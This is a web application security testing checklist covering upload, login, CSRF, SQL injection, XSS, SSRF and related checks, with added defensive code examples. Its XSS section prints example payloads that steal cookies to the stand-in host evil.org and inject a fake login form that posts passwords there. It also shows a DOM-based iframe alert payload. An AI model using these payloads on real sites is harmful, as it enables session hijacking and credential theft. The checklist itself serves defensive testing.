Web security testing checkpoints

Upload function

1. Bypassing the file upload check

2. Limits on uploaded file size and on the number of uploads
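Added example for the two upload checks above (not code from the original post): a server-side validator that enforces a size limit and a per-request file count, accepts only an allowlisted extension, requires the content's magic bytes to match that extension, and never stores the client-supplied name as-is. The limits, the allowlist and the function names are assumptions.

```python
# Added example, not from the original post. Limits and allowlist are assumed.
MAX_FILE_BYTES = 2 * 1024 * 1024      # assumed per-file limit
MAX_FILES_PER_REQUEST = 5             # assumed per-request count limit

# Allowed extensions mapped to the magic bytes the content must start with.
ALLOWED_TYPES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}

def validate_upload(filename: str, data: bytes) -> str:
    """Return a normalized server-side file name, or raise ValueError."""
    if len(data) > MAX_FILE_BYTES:
        raise ValueError("file too large")
    # Keep only the last path component so "../" in the client name is dropped.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        raise ValueError("missing extension")
    # Use the LAST extension only ("a.txt.png" is treated as .png) and then
    # require the bytes to actually look like that type.
    stem, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError("extension not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise ValueError("content does not match extension")
    # Rename on the server: strip everything but [A-Za-z0-9-_] from the stem.
    safe_stem = "".join(c for c in stem if c.isalnum() or c in "-_")[:64] or "upload"
    return f"{safe_stem}.{ext}"

def validate_batch(files) -> list:
    """files: iterable of (client_filename, bytes). Enforces the count limit too."""
    files = list(files)
    if len(files) > MAX_FILES_PER_REQUEST:
        raise ValueError("too many files")
    return [validate_upload(name, data) for name, data in files]
```

The extension and magic-byte checks are a first gate, not proof that a file is harmless; the storage location should still be outside the web root or served without execution rights.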

Registration function

1. Whether the registration request is sent over a secure (encrypted) transport

2. Whether password complexity is checked on the server side during registration

3. Activation link test

4. Repeated registration

5. Batch registration issues

Login function

1. Whether the login request is sent over a secure transport

2. Session fixation: a session fixation attack abuses the server's session mechanism: the attacker plants a session identifier, lets another user authenticate and get authorized under it, and then impersonates that user.

3. Whether the key cookie has HttpOnly: if the HttpOnly flag is set on a cookie, JavaScript cannot read it, so the cookie is not exposed when an XSS occurs.

But many cookies need to be used by front-end JS. So only the key cookie needs attention, that is, the session identifier that uniquely identifies the logged-in user should have this attribute.

4. Whether login requests limit the number of failed attempts

5. "Remember me" function: check whether, with "Remember me" ticked, the cookie records the user name and password

6. Sensitive information in local storage
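Added example covering login checks 2 to 5 above (not code from the original post): a login handler that discards the pre-login session id and issues a fresh one on success (session fixation), counts failed attempts per user and locks after a threshold, and emits the key cookie with HttpOnly, Secure and SameSite. The in-memory store, the timeout and the lockout threshold are assumptions standing in for a real session backend and policy.

```python
# Added example, not code from the original post. Store and limits are assumed.
import secrets
import time

SESSION_TTL_SECONDS = 1800   # assumed idle timeout
MAX_FAILED_LOGINS = 5        # assumed lockout threshold (check 4)

sessions = {}       # session_id -> {"user": ..., "created": ...}; in-memory stand-in
failed_logins = {}  # username -> consecutive failures

def new_session(user=None) -> str:
    """Unpredictable id from the OS CSPRNG; the id is the only secret the cookie holds."""
    sid = secrets.token_urlsafe(32)
    sessions[sid] = {"user": user, "created": time.time()}
    return sid

def login(pre_login_sid: str, username: str, credentials_ok: bool) -> str:
    """credentials_ok is the result of the password check, done elsewhere.
    On success the pre-login id is discarded and a fresh one issued, so an id an
    attacker planted before login (session fixation) never becomes authenticated."""
    if failed_logins.get(username, 0) >= MAX_FAILED_LOGINS:
        raise PermissionError("too many failed attempts; try again later")
    if not credentials_ok:
        failed_logins[username] = failed_logins.get(username, 0) + 1
        raise PermissionError("invalid user name or password")  # same message either way
    failed_logins.pop(username, None)
    sessions.pop(pre_login_sid, None)   # the old id is invalid from now on
    return new_session(username)

def session_cookie(sid: str) -> str:
    """Set-Cookie value for the key cookie. HttpOnly keeps it out of reach of page
    JavaScript (check 3); Secure keeps it off plaintext HTTP (check 1); SameSite
    limits cross-site sending. A 'remember me' cookie (check 5) should likewise
    carry only a random token, never the user name and password."""
    return (f"SESSIONID={sid}; Path=/; Max-Age={SESSION_TTL_SECONDS}; "
            "HttpOnly; Secure; SameSite=Lax")
```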

Verification code function

1. Codes are single-use

2. Verification code bypass

3. SMS verification code bombing: if this interface has no restriction policy, it can be abused maliciously

Forgot password function

1. Recovery by phone number: because the program's design is unreasonable, the SMS verification code can be bypassed to change someone else's password. (Capturing with Burp Suite and modifying the response value to true)

2. Recovery by e-mail

Password security requirements

1. Password complexity requirements

2. Password storage requirements
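Added example for the two password requirements above and for registration check 2 (not code from the original post): a server-side complexity check that returns the list of violations, and storage as a salted PBKDF2-HMAC-SHA256 digest with constant-time verification, so the password itself is never kept. The policy thresholds and iteration count are assumptions.

```python
# Added example, not code from the original post. Policy values are assumed.
import hashlib
import hmac
import os
import re

MIN_LENGTH = 10              # assumed policy
PBKDF2_ITERATIONS = 600_000  # assumed work factor

def check_password_policy(password: str) -> list:
    """Return the list of violations; an empty list means acceptable.
    This is the server-side check; the front end may repeat it for usability
    but must not be the only place it happens."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    classes = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"]
    if sum(bool(re.search(p, password)) for p in classes) < 3:
        problems.append("needs at least three of: lower, upper, digit, symbol")
    if re.search(r"(.)\1{3,}", password):
        problems.append("contains a character repeated four or more times")
    return problems

def hash_password(password: str, salt: bytes = None) -> str:
    """Store algorithm, iterations, salt and digest; never the password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt/iterations and compare in constant time."""
    _algo, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)
```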

Horizontal privilege escalation test: between users of the same level, one user's session can be used to illegally operate on other users' data.

Vertical privilege escalation test: many applications rely only on front-end checks, e.g. a low-privileged role simply does not see the corresponding menu, while the back end does not check whether the currently logged-in user actually has the permission.
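Added example for the horizontal and vertical privilege escalation checks above (not code from the original post): the horizontal check looks the object up and then confirms ownership against the server-side session, and the vertical check compares the role stored in the session against the role an action needs, ignoring any role field the client may send. The role hierarchy and the order records are constructed.

```python
# Added example, not code from the original post. Roles and data are constructed.
ROLE_RANK = {"user": 1, "editor": 2, "admin": 3}   # assumed role hierarchy

# Constructed sample records: orders owned by specific users.
ORDERS = {
    1001: {"owner": "alice", "total": 42},
    1002: {"owner": "bob", "total": 17},
}

def require_role(session: dict, needed: str) -> None:
    """Vertical check: the server decides from the session it issued, never from
    a hidden menu or a role field sent by the client."""
    if ROLE_RANK.get(session.get("role"), 0) < ROLE_RANK[needed]:
        raise PermissionError("insufficient role")

def get_order(session: dict, order_id: int) -> dict:
    """Horizontal check: fetch, then confirm the caller owns the object."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != session["user"]:
        # Same response for 'missing' and 'not yours', so ids cannot be enumerated.
        raise LookupError("order not found")
    return order

def admin_action(session: dict, request_fields: dict) -> str:
    """request_fields may carry a 'role' or 'is_admin' value a client could set;
    it is deliberately never consulted."""
    require_role(session, "admin")
    return f"deleted {request_fields['target']}"   # stand-in for the real action
```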

XSS test

XSS (Cross Site Scripting): a malicious attacker inserts malicious Script code into a Web page; when a user browses the page, the Script code embedded in it is executed, achieving the attacker's malicious purpose.

1. Reflected XSS: the request parameter param2 is used for XSS injection, or any other executable JS or redirect statement may be supplied:

param2=<script>document.write('<img src="http://evil.org?grabcookie.jsp?cookie='+encodeURI(document.cookie)+'"/>')</script>

When a logged-in user of this site clicks it, the cookie is sent to evil.org.

Fix: escape special characters on output, in particular ' " < >.

2. Stored XSS: published in forum posts. Assuming the forum is flawed, the following JS content can be injected into a post:

<script>
document.body.innerHTML="<h1>Please Login</h1><form action=http://evil.org/grabpassword.jsp method=post><br>User name:<input type=text name=user><br>Password:<input type=text name=password></p><input type=submit name=login></form>"
</script>

When other users browse the post, a login box pops up, generated by the XSS injected into the page; if they enter their account password, it is sent to the attacker.

Fix: escape special characters on output, in particular ' " < >

3. DOM-based XSS: compared with reflected and stored XSS, which are server-side execution issues, DOM-based XSS is a client-side (browser) execution issue.

Step 1: the part of the request after the hash is used by client-side JS to dynamically generate page content, allowing XSS injection:

http://www.webapp.com/example.jsp?param1=value1#<iframe onload=alert('xss')>

Step 2: dynamically generated: <div id="m"><iframe onload="alert('xss')"></iframe></div>

This is harder to test; generally one needs to read the page's JS code and analyze it. There is no fixed test procedure, and we all still need to learn. It is not mandatory; WebInspect can scan for it.

Fix: escape special characters on output, in particular ' " < >
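Added example for the "escape special characters on output" fix given under all three XSS types (not code from the original post): an output encoder for & < > " ' applied at render time to a stored post and to a reflected request parameter. The render functions and the post payload used in the check are constructed.

```python
# Added example, not code from the original post. Render functions are assumed.
import html

def escape_html(value: str) -> str:
    """Escape the characters that let untrusted text break out of an HTML text
    node or a quoted attribute: & < > " '  (& first, or the rest get double-escaped)."""
    return (value.replace("&", "&amp;")
                 .replace("<", "&lt;")
                 .replace(">", "&gt;")
                 .replace('"', "&quot;")
                 .replace("'", "&#x27;"))

def matches_stdlib(value: str) -> bool:
    """html.escape(value) from the standard library produces the same output."""
    return escape_html(value) == html.escape(value)

def render_post(author: str, body: str) -> str:
    """Stored XSS: text loaded from the database is escaped at output time,
    both in an attribute value (author) and in element content (body)."""
    return f'<div class="post" data-author="{escape_html(author)}">{escape_html(body)}</div>'

def render_search(param2: str) -> str:
    """Reflected XSS: the request parameter is escaped before being echoed."""
    return f"<p>Results for: {escape_html(param2)}</p>"
```

For the DOM-based case the same principle applies on the client: assign untrusted data such as `location.hash` to `textContent` rather than to `innerHTML` or `document.write`, so the browser never parses it as markup.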

SQL Injection Testing

The basic principle of a SQL injection attack is to construct special input parameters that force the back-end database to execute additional SQL statements, so as to gain access to database data.

These input parameters often contain malicious SQL statements; the program does not filter them and splices them into database queries, leading to leakage of sensitive data.

When constructing dynamic SQL statements, besides the SQL injection caused by improper handling of special characters, improper error handling also brings many security risks to the Web site.

The most common problem is that detailed internal error messages are displayed to the attacker. These details provide important clues about the site's potential weaknesses.

During SQL injection, if the Web server turns off error echo, is it then secure? The answer is clearly no: an attacker can still succeed with the "blind" SQL injection technique.

So-called "blind" injection is the method used when the server returns no error echo: the attacker must find another way to verify whether the injected SQL statement was executed.

"Blind" injection is divided into two types: time-based blind and Boolean-based blind.

Test method (black box): sqlmap is an automated SQL injection tool; its main function is to scan for, find and exploit SQL injection vulnerabilities in a given URL.

Test method (white box): if the project uses the MyBatis persistence framework and its sqlMap is written using the #{xxx} form instead of the ${xxx} form, there is no SQL injection problem.

Note: in the sqlMap, try not to use $. $ uses Statement (string concatenation), which leads to injection problems. # uses PreparedStatement (similar to precompilation), which escapes the value passed to the database, so there is no injection problem. Since the former is prone to SQL injection, using MyBatis # is recommended.
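Added example for the ${} versus #{} point and for the error-handling point above (not code from the original post, and not MyBatis itself): the concatenated form beside the parameterized form, in Python's sqlite3 where `?` placeholders play the role of MyBatis `#{}`, plus a lookup wrapper that logs the database's own error server-side and returns only a generic message to the client. The table and rows are constructed.

```python
# Added example, not code from the original post. Table and rows are constructed.
import sqlite3

SERVER_LOG = []   # stand-in for the application log

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "a-secret"), ("bob", "b-secret")])
    return conn

def find_user_concatenated(conn, name: str) -> list:
    """The ${} style: the value becomes part of the SQL text (vulnerable form)."""
    sql = f"SELECT name FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(sql)]

def find_user_parameterized(conn, name: str) -> list:
    """The #{} style: the SQL text is fixed; the value travels as a parameter."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]

def handle_lookup(conn, name: str, query=find_user_parameterized) -> dict:
    """Generic error handling: the driver's message goes to the server log,
    never into the response, so it gives the attacker no clues."""
    try:
        return {"ok": True, "users": query(conn, name)}
    except sqlite3.Error as exc:
        SERVER_LOG.append(f"lookup failed: {exc}")
        return {"ok": False, "error": "request could not be processed"}
```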

Write interface limit test

For example, the password-retrieval e-mail: calling it multiple times results in mail bombing.
Interfaces that create new data, such as writing articles or uploading files: if they have no restrictions, a malicious user can call them in an infinite loop to write large amounts of data, or upload large files concurrently and repeatedly, filling up the disk and consuming server resources.

Advice: apply the necessary restrictions to write-heavy interfaces (such as uploads).
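Added example for the write-interface restriction above and for the SMS verification code bombing check in the verification code section (not code from the original post): a sliding-window rate limiter keyed per phone number, per client IP and per user, so a loop of requests is cut off after a fixed count per window. The limits, the endpoints and the injected clock are assumptions.

```python
# Added example, not code from the original post. Limits and endpoints are assumed.
import time
from collections import defaultdict, deque

class SlidingWindowLimiter:
    """Allow at most `limit` events per `window_seconds` for each key."""
    def __init__(self, limit: int, window_seconds: float, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window_seconds, clock
        self.hits = defaultdict(deque)   # key -> timestamps inside the window

    def allow(self, key: str) -> bool:
        now = self.clock()
        q = self.hits[key]
        while q and now - q[0] >= self.window:   # drop expired timestamps
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True

# Assumed policy: SMS codes limited per phone AND per client address,
# article writes limited per user.
sms_per_phone = SlidingWindowLimiter(limit=3, window_seconds=600)
sms_per_ip = SlidingWindowLimiter(limit=20, window_seconds=600)
writes_per_user = SlidingWindowLimiter(limit=30, window_seconds=60)

def send_sms_code(phone: str, client_ip: str) -> dict:
    """Check the tighter per-phone limit first, then the per-address limit."""
    if not sms_per_phone.allow(phone) or not sms_per_ip.allow(client_ip):
        return {"sent": False, "reason": "rate limited"}
    return {"sent": True}   # stand-in for actually sending the code

def write_article(user: str, body: str) -> dict:
    if not writes_per_user.allow(user):
        return {"saved": False, "reason": "rate limited"}
    return {"saved": True, "length": len(body)}
```

Counting per phone number alone is not enough, since an abuser can rotate numbers; the per-address limit catches that, and the same pattern (limit per user, per address, per resource) applies to mail-sending and upload endpoints.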

CSRF test

CSRF (Cross-site request forgery). While user C has not logged out of site A, C's browser visits site B, and B uses C's session with A to access A without authorization.
Check:
Ø Is there a random value for CSRF defense? Verification codes and csrf_token both count. Present: pass
Ø Is the Referer verified? Present: pass
Ø Request parameters can be guessed and there is no CSRF defense mechanism: fail
During a test every interface must be checked; the following method can be used: record the interfaces and tag the ones that have been checked.
Repair recommendations:
Ø Method 1: verification code
A verification code forces the user to interact with the application in order to complete the final request, so in general it curbs CSRF attacks well.
However, this approach is not very user-friendly, and there are many ways to bypass simple graphical verification codes. It is an auxiliary CSRF defense.
Ø Method 2: Referer verification
When the browser initiates a request it usually indicates the originating URL in the Referer HTTP header.
Via the Referer we can determine whether a request was initiated from the same domain and so protect against CSRF, but the Referer may contain sensitive information and in some cases can be forged.
So we cannot rely on the Referer as the primary CSRF defense, but we can monitor for CSRF attacks via the Referer.
Ø Method 3: Token verification
Keeping the original request parameters unchanged and adding a new random, unpredictable Token parameter is currently the most common and effective approach.
Before processing data, the back end first validates the Token parameter; only when the Token in the request matches the Token in the user's Session (or Cookie) is the request considered legitimate.
Because of the Token, the attacker cannot construct a complete request to carry out a CSRF attack, thus securing the website or system.
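Added example for Method 2 and Method 3 above (not code from the original post): a per-session random token issued into the session, validated with a constant-time comparison before any data is processed, with the Origin/Referer check used only as a monitoring signal, as the text recommends. The session dict, the header names and the expected host are assumptions.

```python
# Added example, not code from the original post. Session shape and host are assumed.
import hmac
import secrets
from urllib.parse import urlsplit

def issue_csrf_token(session: dict) -> str:
    """Method 3: a random, unpredictable token kept in the server-side session
    and copied by the page into each form or AJAX request."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def referer_is_same_site(headers: dict, expected_host: str) -> bool:
    """Method 2: Origin is preferred, Referer is the fallback. Either may be
    absent or forged, so this is a signal for monitoring, not the main defence."""
    source = headers.get("Origin") or headers.get("Referer")
    return bool(source) and urlsplit(source).hostname == expected_host

def check_csrf(session: dict, form: dict, headers: dict,
               expected_host: str, monitor_log: list) -> bool:
    """Return True only when the request's token matches the session's token."""
    expected = session.get("csrf_token")
    supplied = str(form.get("csrf_token", ""))
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False                     # missing or wrong token: reject
    if not referer_is_same_site(headers, expected_host):
        # Token was right, so let it through, but record the odd origin.
        monitor_log.append(f"csrf-suspect: origin/referer={headers.get('Referer')!r}")
    return True
```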

Disclosure of sensitive information

SVN information disclosure: database account and password information;
Page disclosure of sensitive information: some WEB applications include sensitive information, such as passwords, in the responses returned to the client.

Directory traversal

In web applications, displaying a file directory listing (the server's file list) brings security risks.

CRLF test

CRLF is the HTTP response header splitting vulnerability. It is caused by CR and LF characters entered by the user not being strictly filtered.

Advice: filter or escape CR and LF characters.

Arbitrary file read

Arbitrary file read belongs to the file-operation class of vulnerabilities; generally it allows reading any file, from configuration information to important system files.
In the worst case it can lead to SSRF, and from there to roaming the internal network.
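Added example for the directory traversal and arbitrary file read items above (not code from the original post): a file reader that joins the requested name to the public directory, resolves `..` and symlinks, and only then checks that the real path is still inside that directory. The directory layout is constructed in a temporary folder; the function names are assumptions.

```python
# Added example, not code from the original post. Layout is constructed.
import tempfile
from pathlib import Path

def read_public_file(base_dir: str, requested: str) -> bytes:
    """Serve only files whose RESOLVED path lies under base_dir."""
    base = Path(base_dir).resolve()
    # Join first, then resolve: this collapses '..' and follows symlinks, so the
    # check below sees the real location, not the string the client sent.
    # An absolute 'requested' replaces base entirely and is caught the same way.
    target = (base / requested).resolve()
    if target != base and base not in target.parents:
        raise PermissionError("path escapes the public directory")
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target.read_bytes()

def build_demo_dir() -> str:
    """Constructed layout: <tmp>/public/readme.txt is servable,
    <tmp>/secret.txt sits one level above and must never be readable."""
    root = Path(tempfile.mkdtemp())
    (root / "public").mkdir()
    (root / "public" / "readme.txt").write_bytes(b"hello")
    (root / "secret.txt").write_bytes(b"db password")
    return str(root / "public")
```

Checking the raw string for `..` is not a substitute: encodings, mixed separators and symlinks all get past string checks, while the resolved path is what the operating system will actually open.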

URL redirection test

Test URL redirection:
Open the Internet Explorer browser on the host computer and enter the URL you specified for the redirect.
Verify whether the Web page opens in Internet Explorer on the guest virtual machine.
Repeat this process for each URL to be tested.
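Added example for the URL redirection test above and for the CRLF advice in the CRLF section (not code from the original post): a redirect-target check that accepts only same-site relative paths or https URLs on the site's own host, and a header-value check that rejects CR/LF before a Location header is built. The site host and the function names are assumptions.

```python
# Added example, not code from the original post. Site host is assumed.
from urllib.parse import urlsplit

SITE_HOST = "www.webapp.com"   # assumed own host

def clean_header_value(value: str) -> str:
    """Header values must not carry CR or LF. Rejecting (rather than stripping)
    keeps a splitting attempt visible instead of silently altering it."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return value

def safe_redirect_target(target: str, default: str = "/") -> str:
    """Allow only same-site relative paths or absolute https URLs on our host."""
    if not target:
        return default
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: only https on our own host.
        if parts.scheme != "https" or parts.hostname != SITE_HOST:
            return default
        return target
    # Relative: exactly one leading slash ("//h" and "/\h" are host-relative in browsers).
    if not target.startswith("/") or target.startswith("//") or target.startswith("/\\"):
        return default
    return target

def location_header(target: str) -> str:
    """Build the Location header from an untrusted 'next' parameter."""
    return "Location: " + clean_header_value(safe_redirect_target(target))
```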

Clickjacking

Clickjacking is a visual deception. There are roughly two methods: first, the attacker overlays a transparent iframe on a page and convinces the user to operate on the page, so the user unknowingly clicks inside the transparent iframe; second, the attacker covers a position on the page with a picture, obscuring the original meaning of that position.

XXE

In simple terms, XXE is XML external entity injection. When referencing external entities is allowed, by constructing malicious content it is possible to read arbitrary files, execute system commands, probe network ports, attack internal network sites and cause other harm.
For example, if the program you are using is PHP, you can set libxml_disable_entity_loader to TRUE to disable external entities, which serves as a defense.

SSRF

SSRF (Server-Side Request Forgery) is a security vulnerability in which the attacker constructs a request that is then initiated by the server. In general, SSRF targets the site's internal systems. (Because the server can reach the internal systems, it can be used to attack an internal network that cannot be reached from outside; that is, the target site acts as a middleman.)

CORS problem

Cross-Origin Resource Sharing (CORS), by definition, is cross-domain sharing: when two different domains access each other, access is denied by default, and the CORS problem needs to be addressed.
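Added example for the clickjacking and CORS items above (not code from the original post): an audit of a captured response's headers that flags a page which can be framed (no X-Frame-Options DENY/SAMEORIGIN and no CSP frame-ancestors) and a CORS policy that allows an untrusted or null origin, especially together with credentials. The trusted-origin set and the sample responses are constructed.

```python
# Added example, not code from the original post. Trusted origins are assumed.
TRUSTED_ORIGINS = {"https://www.webapp.com", "https://app.webapp.com"}

def audit_response(headers: dict) -> list:
    """Return a list of findings for one HTTP response; empty means no issue
    for these two checks. Header names are matched case-insensitively."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    # Clickjacking: either mechanism stops the page being framed by other sites.
    xfo = h.get("x-frame-options", "").strip().upper()
    csp = h.get("content-security-policy", "")
    if xfo not in ("DENY", "SAMEORIGIN") and "frame-ancestors" not in csp:
        findings.append("clickjacking: response can be framed "
                        "(no X-Frame-Options DENY/SAMEORIGIN, no CSP frame-ancestors)")

    # CORS: the dangerous pattern is echoing an arbitrary Origin, or 'null',
    # and then also sending cookies with it.
    acao = h.get("access-control-allow-origin", "").strip()
    with_creds = h.get("access-control-allow-credentials", "").strip().lower() == "true"
    if acao and acao != "*" and acao not in TRUSTED_ORIGINS:
        what = "null origin" if acao == "null" else f"untrusted origin {acao}"
        findings.append(f"cors: {what} allowed" + (" with credentials" if with_creds else ""))
    if acao == "*" and with_creds:
        findings.append("cors: wildcard origin with credentials "
                        "(browsers refuse the combination, but it shows no origin policy exists)")
    return findings
```

Running this over responses to the same request sent with a few different Origin values (one trusted, one untrusted, one literally `null`) shows whether the server reflects whatever it is given.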

Origin www.cnblogs.com/mrgavin/p/11626792.html